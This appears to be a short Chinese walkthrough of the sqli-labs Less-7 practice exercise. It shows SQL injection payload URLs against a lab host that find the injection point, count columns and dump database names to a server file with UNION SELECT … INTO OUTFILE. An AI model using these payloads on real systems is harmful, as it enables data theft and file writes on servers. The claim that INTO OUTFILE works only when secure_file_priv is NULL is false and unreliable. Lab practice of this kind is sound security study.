1.into outfile的作用
into outfile的作用就是将在数据库中选择的数据导出到文件中,但并不是任意情况下都可以使用的,只有当数据库的secure_file_priv为NULL时才可以使用
2.注入过程
首先还是找到注入点:
http://192.168.0.100/sqli-labs-master/Less-7/?id=1'))--+
这一步应该不难
接下来要用order by 来确定原查询有多少列,最终查到的结果应该是三列
这里开始就是这一关与前面不同的地方了:
执行这一段语句,选出所有的数据库名,写入到我们指定的文件路径中
http://192.168.0.100/sqli-labs-master/Less-7/?id=-1')) union select 1,schema_name,3 from information_schema.schemata into outfile "E:\\database.txt"--+
查看一下文档:
确实多出了一个database.txt的文件,再看看里面的内容